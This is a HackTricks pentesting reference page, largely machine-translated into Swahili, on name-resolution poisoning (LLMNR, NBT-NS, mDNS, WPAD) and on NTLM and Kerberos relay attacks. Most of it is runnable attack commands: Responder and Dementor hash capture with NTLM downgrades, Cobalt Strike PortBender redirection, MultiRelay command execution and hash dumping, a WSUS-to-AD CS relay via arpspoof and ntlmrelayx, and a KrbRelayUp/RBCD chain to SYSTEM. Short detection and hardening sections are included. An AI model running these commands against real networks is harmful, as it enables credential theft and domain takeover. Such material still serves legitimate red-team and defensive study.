Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Protokoli za Mtandao

Protokoli za Utambuzi wa Jina la Host ya Ndani

  • LLMNR, NBT-NS, and mDNS:
  • Microsoft na mifumo mingine ya uendeshaji hutumia LLMNR na NBT-NS kwa utambuzi wa majina ya ndani wakati DNS inashindwa. Vivyo hivyo, mifumo ya Apple na Linux hutumia mDNS.
  • Protokoli hizi zinaweza kukabiliwa na interception na spoofing kutokana na kuwa bila uthibitisho na kutangazwa kwa UDP.
  • Responder na Dementor zinaweza kutumika kuiga huduma kwa kutuma majibu yaliyofungwa kwa hosts zinazoulizia kupitia protokoli hizi.
  • Further information on service impersonation using Responder can be found here.

Web Proxy Auto-Discovery Protocol (WPAD)

  • WPAD inaruhusu browsers kugundua mipangilio ya proxy kiotomatiki.
  • Ugunduzi hufanywa kupitia DHCP, DNS, au kurejea kwa LLMNR na NBT-NS ikiwa DNS inashindwa.
  • Responder inaweza kuendesha mashambulizi ya WPAD kiotomatiki, kuelekeza clients kwa WPAD servers zenye madhara.

Responder/Dementor kwa Protocol Poisoning

  • Responder ni zana inayotumika kwa poisoning ya LLMNR, NBT-NS, na mDNS queries, ikijibu kwa uteuzi kulingana na aina za query, hasa ikilenga huduma za SMB.

  • Imejengwa kabla katika Kali Linux, inaweza kusanidiwa kwa /etc/responder/Responder.conf.

  • Responder inaonyesha captured hashes kwenye skrini na kuziweka kwenye saraka ya /usr/share/responder/logs.

  • Inasaidia IPv4 na IPv6.

  • Windows version ya Responder inapatikana here.

  • Dementor inaongeza zaidi kwenye mada za multicast poisoning na pia inafanya kazi kama rogue service provider (ikiwa ni pamoja na CUPS RCE support)

  • Muundo kwa ujumla ni sawa na Responder na usanidi wa kina zaidi. (default iko hapa: Dementor.toml)

  • Compatibility between Dementor and Responder is given here: Compatibility Matrix

  • Intro and Documentation here: Dementor - Docs

  • Inarekebisha matatizo ya capture yaliyotokana na Responder kwenye baadhi ya protocols

Kuingiza Responder

  • To run Responder with default settings: responder -I <Interface>
  • For more aggressive probing (with potential side effects): responder -I <Interface> -P -r -v
  • Techniques to capture NTLMv1 challenges/responses for easier cracking: responder -I <Interface> --lm --disable-ess
  • WPAD impersonation can be activated with: responder -I <Interface> --wpad
  • NetBIOS requests can be resolved to the attacker’s IP, and an authentication proxy can be set up: responder.py -I <interface> -Pv

Kuingiza Dementor

  • With detault settings applied: Dementor -I <interface>
  • With default settings in analysis mode: Dementor -I <interface> -A
  • Automatic NTLM session downgrade (ESS): Dementor -I <interface> -O NTLM.ExtendedSessionSecurity=Off
  • Run current session with custom config: Dementor -I <interface> --config <file.toml>

DHCP Poisoning with Responder

  • Spoofing DHCP responses inaweza kuchangia kuharibu kwa kudumu taarifa za routing za mshambuliaji, ikitoa mbadala ya kimya kuliko ARP poisoning.
  • Inahitaji uelewa sahihi wa usanidi wa mtandao unaolengwa.
  • Running the attack: ./Responder.py -I eth0 -Pdv
  • Njia hii inaweza kwa ufanisi kushika NTLMv1/2 hashes, lakini inahitaji kushughulikiwa kwa makini ili kuepuka kuingilia kazi ya mtandao.

Capturing Credentials with Responder/Dementor

  • Responder/Dementor itaiga huduma kwa kutumia protokoli zilizotajwa hapo juu, ikikamata credentials (kawaida NTLMv2 Challenge/Response) wakati mtumiaji anajaribu kuuthibitisha dhidi ya huduma zilizoigizwa.
  • Maajaribio yanaweza kufanywa kudowngrade hadi NetNTLMv1 au kuzima ESS kwa ajili ya urahisi wa kufanya cracking ya credentials.

If you already have a writable SMB share that victims browse, you can coerce outbound SMB without spoofing by planting UNC-based lure files (SCF/LNK/library-ms/desktop.ini/Office) generated with ntlm_theft, then catching the authentication with Responder. See the Explorer-triggered UNC lure workflow.

Ni muhimu kutambua kwamba kutekeleza mbinu hizi kunapaswa kufanywa kisheria na kwa maadili, kuhakikisha idhini sahihi na kuepuka kusababisha usumbufu au upatikanaji usioidhinishwa.

Inveigh

Inveigh ni zana kwa penetration testers na red teamers, iliyoundwa kwa mifumo ya Windows. Inatoa kazi zinazofanana na Responder, ikitekeleza spoofing na man-in-the-middle attacks. Zana imeendelea kutoka script ya PowerShell hadi binary ya C#, na Inveigh na InveighZero kama toleo kuu. Parameters na maelekezo ya kina yanapatikana kwenye wiki.

Inveigh inaweza kuendeshwa kupitia PowerShell:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Au kutekelezwa kama binary ya C#:

Inveigh.exe

NTLM Relay Attack

Shambulio hili linatumia vikao vya uthibitishaji vya SMB ili kufikia mashine lengwa, na kutoa system shell ikiwa litafanikiwa. Mambo muhimu yanayohitajika ni:

  • Mtumiaji anayethibitisha lazima awe na Local Admin access kwenye relayed host.
  • SMB signing inapaswa kuzimwa.

445 Port Forwarding and Tunneling

Katika matukio ambapo kuingia moja kwa moja kwenye mtandao haiwezekani, trafiki kwenye port 445 inahitaji kupelekwa na kutumwa kupitia tunnel. Zana kama PortBender zinasaidia kuirudisha trafiki ya port 445 hadi port nyingine, jambo muhimu pale ambapo local admin access inapatikana kwa ajili ya driver loading.

PortBender setup and operation in Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Zana nyingine za NTLM Relay Attack

  • Metasploit: Imesanidiwa kwa kutumia proxies, pamoja na maelezo ya local na remote hosts.
  • smbrelayx: Script ya Python kwa relaying SMB sessions, kutekeleza amri au kupeleka backdoors.
  • MultiRelay: Chombo kutoka Responder suite kwa relay specific users au all users, execute commands, au dump hashes.

Kila chombo kinaweza kusanidiwa kufanya kazi kupitia SOCKS proxy ikiwa ni muhimu, kuwaruhusu attacks hata kwa indirect network access.

Uendeshaji wa MultiRelay

MultiRelay inatekelezwa kutoka saraka /usr/share/responder/tools, ikilenga IPs maalum au users.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

RelayKing – kugundua malengo yanayoweza ku-relay na orodha za relay zilizopangwa

RelayKing ni NTLM relay exposure auditor inayochora ramani ya maeneo ambapo relays zinaweza kufanya kazi na hutengeneza orodha za malengo tayari-kutumiwa kwa ntlmrelayx.py -tf. Inakagua ugumu wa itifaki (SMB signing/channel binding; HTTP/HTTPS/MSSQL/LDAP/LDAPS EPA/CBT; RPC auth) na inaonyesha coercion/reflection helpers (PetitPotam/PrinterBug/DFSCoerce, WebClient/WebDAV, NTLMv1, CVE-2025-33073 reflection).

  • Auth inaongeza uaminifu kwa ukaguzi wa HTTPS/LDAPS CBT na MSSQL EPA; SMB signing/signature level inachunguzwa bila uthibitisho.
  • Cross-protocol relay pathing inatumia matokeo yaliyothibitishwa ya Net-NTLMv1 (--ntlmv1/--ntlmv1-all); ukadiriaji wa ukali unatolewa kwa kila njia.
  • --gen-relay-list <file> inaandika orodha ya malengo inayofaa kwa grep kwa ntlmrelayx.py -tf <file> ili kuepuka jaribio-na-kosa.
  • --coerce-all inachochea kwa wingi PetitPotam/DFSCoerce/PrinterBug dhidi ya malengo yote; --ntlmv1-all (RemoteRegistry) na --audit (domain-wide LDAP host pull) ni noisy na huzalisha logons/remote accesses nyingi.
  • --proto-portscan huharakisha skanning kwa kuruka ports zilizofungwa; --krb-dc-only husaidia wakati DCs zinazuia NTLM lakini services nyingine bado zinakubali.

Example sweeps:

# Authenticated audit across multiple protocols + generate relay list for ntlmrelayx
python3 relayking.py -u lowpriv -p 'P@ssw0rd!' -d lab.local --dc-ip 10.0.0.10 \
--audit --protocols smb,ldap,ldaps,mssql,http,https --proto-portscan --ntlmv1 \
--threads 10 -vv -o plaintext,json --output-file relayking-scan --gen-relay-list relaytargets.txt

# Unauthenticated CIDR sweep for SMB/LDAP/HTTP relayability
python3 relayking.py --null-auth --protocols smb,ldap,http --proto-portscan -o plaintext 10.10.0.0/24

Zana hizi na mbinu zinaunda seti kamili kwa kufanya mashambulizi ya NTLM Relay katika mazingira mbalimbali ya mtandao.

Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8)

Watumiaji wa WSUS hujitambulisha kwa seva yao ya masasisho kutumia NTLM juu ya HTTP (8530) au HTTPS (8531). Wakati HTTP imewezeshwa, kuingia kwa mara kwa mara kwa wateja kunaweza kulazimishwa au kukamatwa kwenye segimenti ya ndani na kupelekwa kwa ntlmrelayx kuelekea LDAP/LDAPS/SMB au AD CS HTTP endpoints (ESC8) bila kuvunja hashes yoyote. Hii inaingiliana na trafiki ya kawaida ya masasisho na mara nyingi hupata uthibitisho wa akaunti za mashine (HOST$).

What to look for

  • GPO/registry configuration under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate and …\WindowsUpdate\AU:
  • WUServer (e.g., http://wsus.domain.local:8530)
  • WUStatusServer (reporting URL)
  • UseWUServer (1 = WSUS; 0 = Microsoft Update)
  • DetectionFrequencyEnabled and DetectionFrequency (hours)
  • WSUS SOAP endpoints used by clients over HTTP:
  • /ClientWebService/client.asmx (approvals)
  • /ReportingWebService/reportingwebservice.asmx (status)
  • Default ports: 8530/tcp HTTP, 8531/tcp HTTPS

Reconnaissance

  • Unauthenticated
  • Scan for listeners: nmap -sSVC -Pn –open -p 8530,8531 -iL
  • Sniff HTTP WSUS traffic via L2 MITM and log active clients/endpoints with wsusniff.py (HTTP only unless you can make clients trust your TLS cert).
  • Authenticated
  • Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer).
  • Query endpoints at scale from hosts (NetExec) or locally: nxc smb -u -p -M reg-query -o PATH=“HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate” KEY=“WUServer” reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate

End-to-end HTTP relay steps

  1. Position for MITM (same L2) so a client resolves the WSUS server to you (ARP/DNS poisoning, Bettercap, mitm6, etc.). Example with arpspoof: arpspoof -i -t <wsus_client_ip> <wsus_server_ip>

  2. Redirect port 8530 to your relay listener (optional, convenient): iptables -t nat -A PREROUTING -p tcp –dport 8530 -j REDIRECT –to-ports 8530 iptables -t nat -L PREROUTING –line-numbers

  3. Start ntlmrelayx with the HTTP listener (requires Impacket support for HTTP listener; see PRs below): ntlmrelayx.py -t ldap:// -smb2support -socks –keep-relaying –http-port 8530

Other common targets:

  • Relay to SMB (if signing off) for exec/dump: -t smb://
  • Relay to LDAPS for directory changes (e.g., RBCD): -t ldaps://
  • Relay to AD CS web enrollment (ESC8) to mint a cert and then authenticate via Schannel/PKINIT: ntlmrelayx.py –http-port 8530 -t http:///certsrv/certfnsh.asp –adcs –no-http-server For deeper AD CS abuse paths and tooling, see the AD CS page:

AD CS Domain Escalation

  1. Trigger a client check-in or wait for schedule. From a client: wuauclt.exe /detectnow or use the Windows Update UI (Check for updates).

  2. Use the authenticated SOCKS sessions (if -socks) or direct relay results for post-exploitation (LDAP changes, SMB ops, or AD CS certificate issuance for later authentication).

HTTPS constraint (8531)

  • Passive interception of WSUS over HTTPS is ineffective unless clients trust your certificate. Without a trusted cert or other TLS break, the NTLM handshake can’t be harvested/relayed from WSUS HTTPS traffic.

Notes

  • WSUS was announced deprecated but remains widely deployed; HTTP (8530) is still common in many environments.
  • Useful helpers: wsusniff.py (observe HTTP WSUS check-ins), wsuspider.sh (enumerate WUServer/WUStatusServer from GPOs), NetExec reg-query at scale.
  • Impacket restored HTTP listener support for ntlmrelayx in PR #2034 (originally added in PR #913).

Force NTLM Logins

Kwenye Windows unaweza kuwa na uwezo wa kulazimisha baadhi ya akaunti zilizo na mamlaka kuidhinishwa kwa mashine yoyote. Soma ukurasa ufuatao kujifunza jinsi:

Force NTLM Privileged Authentication

Kerberos Relay attack

A Kerberos relay attack steals an AP-REQ ticket from one service and re-uses it against a second service that shares the same computer-account key (because both SPNs sit on the same $ machine account). This works even though the SPNs’ service classes differ (e.g. CIFS/LDAP/) because the key that decrypts the ticket is the machine’s NT hash, not the SPN string itself and the SPN string is not part of the signature.

Unlike NTLM relay, the hop is limited to the same host but, if you target a protocol that lets you write to LDAP, you can chain into Resource-Based Constrained Delegation (RBCD) or AD CS enrollment and pop NT AUTHORITY\SYSTEM in a single shot.

For detailed info about this attack check:

TokenPurposeRelay relevance
TGT / AS-REQ ↔ REPInathibitisha mtumiaji kwa KDChaibadilishwa
Service ticket / TGS-REQ ↔ REPBound to one SPN; encrypted with the SPN owner’s keyinterchangeable if SPNs share account
AP-REQClient sends TGS to the servicewhat we steal & replay
  • Tiketi zimefichwa kwa password-derived key of the account that owns the SPN.
  • The Authenticator inside the AP-REQ has a 5-minute timestamp; replay inside that window is valid until the service cache sees a duplicate.
  • Windows rarely checks if the SPN string in the ticket matches the service you hit, so a ticket for CIFS/HOST normally decrypts fine on LDAP/HOST.
    1. What must be true to relay Kerberos
  1. Shared key: source and target SPNs belong to the same computer account (default on Windows servers).
  2. No channel protection: SMB/LDAP signing off and EPA off for HTTP/LDAPS.
  3. You can intercept or coerce authentication: LLMNR/NBNS poison, DNS spoof, PetitPotam / DFSCoerce RPC, fake AuthIP, rogue DCOM, etc..
  4. Ticket source not already used: you win the race before the real packet hits or block it entirely; otherwise the server’s replay cache fires Event 4649.
  5. You need to somehow be able to perform a MitM in the communication maybe being part of the DNSAmins group to modify the DNS of the domain or being able to change the HOST file of the victim.

Kerberos Relay Steps

  • 3.1 Recon the host
# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName
  • 3.2 Anzisha relay listener

KrbRelayUp

# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8

KrbRelayUp inafunga KrbRelay → LDAP → RBCD → Rubeus → SCM bypass katika binary moja.

  • 3.3 Coerce Kerberos auth
# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50

DFSCoerce hufanya DC itume tiketi ya Kerberos CIFS/DC01 kwetu.

  • 3.4 Relay the AP-REQ

KrbRelay huchota blob ya GSS kutoka SMB, huipakia upya ndani ya LDAP bind, na kuipeleka kwa ldap://DC01 — uthibitisho unafanikiwa kwa sababu mfunguo uleule unaifungua.

  • 3.5 Tumia vibaya LDAP ➜ RBCD ➜ SYSTEM
# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe

Sasa umemiliki NT AUTHORITY\SYSTEM.

Njia nyingine muhimu kujua

NjiaMbinuKwa nini inafaa
AuthIP / IPSecFake server sends a GSS-ID payload with any SPN; client builds an AP-REQ straight to youWorks even across subnets; machine creds by default
DCOM / MSRPCMalicious OXID resolver forces client to auth to arbitrary SPN and portPure local priv-esc; sidesteps firewall
AD CS Web EnrollRelay machine ticket to HTTP/CA and get a cert, then PKINIT to mint TGTsBypasses LDAP signing defenses
Shadow CredentialsWrite msDS-KeyCredentialLink, then PKINIT with forged key pairNo need to add a computer account

Utatua matatizo

HitilafuMaanaSuluhisho
KRB_AP_ERR_MODIFIEDUfunguo wa tiketi ≠ ufunguo wa lengoHost/SPN si sahihi
KRB_AP_ERR_SKEWClock > 5 min offsetSahihisha saa au tumia w32tm
LDAP bind failsSigning imetumikaTumia AD CS path au zima signing
Event 4649 spamService saw duplicate Authenticatorzuia au shindana na paketi ya asili (race)

Utambuzi

  • Kuongezeka kwa Event 4769 kwa CIFS/, HTTP/, LDAP/ kutoka chanzo kimoja ndani ya sekunde.
  • Event 4649 kwenye huduma inaonyesha replay imetambuliwa.
  • Kerberos logon kutoka 127.0.0.1 (relay to local SCM) ni shaka sana—tumia ramani kupitia sheria ya Sigma katika nyaraka za KrbRelayUp.
  • Tazama mabadiliko ya sifa msDS-AllowedToActOnBehalfOfOtherIdentity au msDS-KeyCredentialLink.

Kuimarisha

  1. Enforce LDAP & SMB signing + EPA on every server.
  2. Split SPNs so HTTP isn’t on the same account as CIFS/LDAP.
  3. Patch coercion vectors (PetitPotam KB5005413, DFS, AuthIP).
  4. Set ms-DS-MachineAccountQuota = 0 to stop rogue computer joins.
  5. Alert on Event 4649 and unexpected loopback Kerberos logons.

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks